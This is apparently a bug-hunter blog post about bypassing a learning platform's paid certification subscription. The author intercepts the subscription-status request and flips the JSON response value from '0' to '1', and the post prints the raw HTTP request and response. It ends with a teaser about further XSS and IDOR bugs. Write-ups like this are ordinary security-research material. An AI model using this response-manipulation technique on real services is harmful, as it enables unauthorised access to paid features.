Bypassed the subscription and got the certification

Share on facebook
Share on twitter
Share on linkedin
Share on reddit
Share on email

Hey fellow hackers and bug hunter’s,

Story of Bypass the subscription by response manipulation.

Yesterday, I was searching for the target .After some time i ended up with the learning platform .For example( test.com ).On entering into the website , there is one tab called certification.In the certification page ,there are lots of courses available.

I saw the Java Programming course and i click the java certification ,It asks to attend the test and i clicked the attend button ,The website shows subscription needed , I was like WTF!!!

All you know What i am going to do now,I intercept the request for attend, The request looks like,

POST /Service/Users.aspx/UserSubscriptionStatus HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: https://www.test.com
Connection: close
Referer: https://www.test.com/certifications/java-programming
Cookie: cookies;{UserID:’210125'}

And the response looks like,

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Sat, 23 Oct 2021 07:21:46 GMT
Connection: close
Content-Length: 9{“d”:”0"}

Here , What i done was ,Just i changed the d value to “1” and the subscription bypassed and I was like

And more XSS and IDOR vulnerabilities are there in

Read the article